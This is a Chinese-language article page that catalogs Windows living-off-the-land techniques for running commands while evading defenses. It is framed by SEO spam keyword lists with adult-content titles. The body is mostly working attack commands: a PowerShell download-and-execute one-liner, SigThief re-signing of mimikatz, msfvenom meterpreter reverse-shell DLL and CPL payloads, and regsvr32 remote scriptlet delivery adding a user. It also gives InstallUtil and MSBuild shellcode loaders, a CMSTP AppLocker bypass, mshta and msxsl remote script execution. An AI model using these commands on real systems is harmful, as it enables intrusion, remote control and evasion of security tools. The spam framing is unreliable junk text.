日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

Windows命令執行防御規避總結

瀏覽:285日期:2022-11-12 13:56:43

今天小編為大家帶來Windows命令執行防御規避總結,具體如下:

Windows命令執行防御規避總結

powershell

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx:8888/logo.gif’))”“ /f

SIP

通過sip劫持對惡意代碼簽名獲得系統信任https://github.com/secretsquirrel/SigThief

python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe

rundll32.exe

生成

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll

目標執行

rundll32.exe shell32.dll,Control_RunDLL xxx.dll

Regsvr32.exe

msfconsole

auxiliary/server/regsvr32_command_delivery_server

set CMD net user test 123456 /add

目標執行

regsvr32 /s /n /u /i:http://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll

InstallUtil.exe

1.編譯后門:

C:WindowsMicrosoft.NETFramework64v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:”C:Program Files (x86)Microsoft SDKsWindowsv10.0AbinNETFX 4.8 Toolsx64key.snk“ xxx.cs

2.靶機上運行:

InstallUtil.exe /U xxx.exe

3.msf監聽,得到反彈的shell:

set payload windows/x64/meterpreter/reverse_tcp

set LHOST xx.xx.xx.xx

set LPORT 4444

exploit

Msbuild.exe

MSBuild是Microsoft Build Engine的縮寫,代表Microsoft和Visual Studio的新的生成平臺,MSBuild可編譯特定格式的xml文件

https://github.com/3gstudent/msbuild-inline-task

msf生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444

-f csharp

使用shellcode替換https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分

msf監聽

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost xx.xx.xx.xx

set lport 4444

exploit

運行

C:WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe exec64.xml

CMSTP

cmstp.exe /s /ns C:UsersadministratorAppDataLocalTempXKNqbpzl.txt繞過AppLocker并啟動惡意腳本

Mshta.exe

Mshta.exe 是一個執行 Microsoft HTML 應用程序 (HTA) 的實用程序,攻擊者可以使用 mshta.exe 通過受信任的 Windows 實用程序代理執行惡意代碼

use exploit/windows/misc/hta_server

msf exploit(windows/misc/hta_server) 》 set srvhost xx.xx.xx.xx

msf exploit(windows/misc/hta_server) 》 exploit

mshta.exe http://xx.xx.xx.xx:8080/xxxxxxx.hta

控制面板

攻擊者可以使用控制面板項作為有效載荷來執行任意命令,控制面板項是注冊的可執行文件(.exe)或控制面板(.cpl)文件,可以直接從命令行執行或通過Control_RunDLL(API)調用或者直接雙擊文件。

攻擊者構造惡意的dll文件CPIApplet.dll

利用msf生成dll文件:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll

傳入windows機器,然后重命名為CPIApplet.cpl,通過control.exe c:usersadministratordesktopCPIApplet.cpl 執行命令

通過msxsl.exe調用惡意xml文件執行腳本

制作兩個文件

customers.xml

script.xsl

xmlns:xsl=”http://www.w3.org/1999/XSL/Transform“

xmlns:msxsl=”urn:schemas-microsoft-com:xslt“

xmlns:user=”http://mycompany.com/mynamespace“》

function xml(nodelist) {

var r = new ActiveXObject(”WScript.Shell“).Run(”cmd.exe /k calc.exe“);

return nodelist.nextNode().xml;

}

開啟http服務

python3 -m http.server 80

遠程下載執行

msxsl.exe http://xx.xx.xx.xx/customers.xml http://xx.xx.xx.xx/scrip.xsl

標簽: Windows系統
相關文章:
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
亚洲激情黄色| 青青国产91久久久久久| 久久九九精品| 日韩国产成人精品| 好吊视频一区二区三区四区| 国产日韩电影| 久久精品国产999大香线蕉| 性欧美精品高清| 久久激情网站| 91一区二区| 精品免费在线| 丰满少妇一区| 精品国产第一福利网站| 91亚洲国产成人久久精品| 欧美国产另类| 国产a久久精品一区二区三区| 国产日韩欧美三级| 男女性色大片免费观看一区二区 | 国产免费av一区二区三区| 日韩专区欧美专区| 日韩视频在线一区二区三区| 亚洲一区二区毛片| 亚洲男人在线| 欧美天堂一区| 国产一区一一区高清不卡| 美女福利一区二区三区| 欧美精品高清| 999国产精品| 黄色日韩在线| 日韩激情网站| 精品在线网站观看| 亚洲国内精品| 欧美在线首页| 久久久9色精品国产一区二区三区| 亚洲欧洲另类| 国产精品超碰| 国产在线|日韩| 一区二区三区网站| 久久国产乱子精品免费女| 日韩毛片视频| 亚洲精品观看| 日韩在线综合| 免费人成在线不卡| 老司机免费视频一区二区| 欧美日韩一区二区综合| 日韩毛片一区| 久久精品高清| 久久久久久亚洲精品美女| 蜜桃伊人久久| 伊人久久大香线蕉av不卡| 久久久久久久久成人| 日韩视频1区| 欧美一级专区| 精品免费av在线| 国产一区二区色噜噜| 久久av资源| 国产精品一页| 日本91福利区| 国产毛片一区| 日韩高清不卡| 色一区二区三区四区| 日韩不卡一区二区三区| 美女网站久久| 日韩三区在线| 久久久一二三| 欧美91在线| 日韩精品视频网站| 亚洲欧美日韩综合国产aⅴ| av一区在线| 91亚洲成人| 久久精品一区二区三区中文字幕| 久久国产人妖系列| 午夜久久美女| 日韩在线精品| 麻豆精品国产91久久久久久| 亚洲精一区二区三区| 国产综合欧美| 亚洲一级少妇| 国产精品高颜值在线观看| 国产精品观看| 国产欧美一区二区三区精品观看| 精品一区在线| 欧美专区18| 伊人久久婷婷| 日韩亚洲精品在线| 中文一区在线| 亚洲精品系列| 最新国产精品| 91精品国产自产观看在线| 无码日韩精品一区二区免费| 天海翼精品一区二区三区| 国产日产一区| 精品国产亚洲一区二区三区大结局| 国产精品免费99久久久| 青草国产精品| 国产成人久久| 精品一区在线| 亚洲三级毛片| 精品一区二区三区中文字幕在线| 国产精品激情电影| 日韩精品久久久久久久电影99爱| 国产精品99一区二区| 亚洲免费高清| 视频一区在线播放| 日本不卡不码高清免费观看| 青青草国产成人99久久| 国产一区国产二区国产三区| 久久亚洲专区| 欧美在线看片| 久久wwww| 欧美日韩18| 99热精品久久| 日韩欧美2区| 水蜜桃久久夜色精品一区| 欧美在线资源| 久久精品一本| 免费成人性网站| 国产区精品区| 成人免费电影网址| 日本va欧美va精品| 欧美日韩中文一区二区| 国产欧美日韩免费观看| 久久久久国产| 国产精品网站在线看| 九九综合在线| 福利一区二区| 精品国产亚洲一区二区三区在线 | 激情不卡一区二区三区视频在线| 99视频精品视频高清免费| 91精品日本| 日韩视频精品在线观看| 欧美日一区二区三区在线观看国产免| 麻豆视频在线看| 欧美日本三区| 免费在线观看一区二区三区| 影院欧美亚洲| 久久激情网站| 国产中文欧美日韩在线| 日韩不卡手机在线v区| 在线综合欧美| 在线午夜精品| 久久久久久久久99精品大| av日韩中文| 国产精品调教| 91av亚洲| 久久久久国产精品一区二区| 国产精品欧美大片| 亚洲精品伊人| 日本中文字幕不卡| 亚洲青青久久| 青青草91久久久久久久久| 亚洲三级观看| 一区二区三区四区日韩| 欧美一区影院| 国产乱人伦丫前精品视频| 欧美日韩国产一区二区在线观看| 日韩欧美激情| 国产精品国产三级在线观看| 精品久久久网| 久久激情婷婷| 欧美中文日韩| 综合一区二区三区| 色综合视频一区二区三区日韩| 亚洲综合福利| 日韩理论片av| 午夜国产一区二区| 少妇精品在线| 久久精品999| 你懂的国产精品| 日韩av首页| 久久www成人_看片免费不卡| 99视频精品全部免费在线视频| 蜜桃av一区| 国产精品videosex极品| 天堂中文av在线资源库| 亚洲欧美成人综合| 日韩高清一区在线| 国产精品视频一区二区三区综合| 欧美激情在线精品一区二区三区| 99成人在线视频| 日韩精品一区二区三区中文在线 | 国产成人免费视频网站视频社区| 精品国产网站| 麻豆亚洲精品| 日本不卡视频在线观看| 国产精品毛片久久| 青青草视频一区| 成人免费电影网址| 欧美天堂在线| 一区在线免费| 国产精品久久久久久久久久10秀 | 欧美精品中文字幕亚洲专区| 国产成人精品免费视| 国产伦精品一区二区三区千人斩| 婷婷国产精品| 国产一级成人av| 欧美在线网站| 在线天堂中文资源最新版| 亚洲毛片在线| 夜夜精品视频|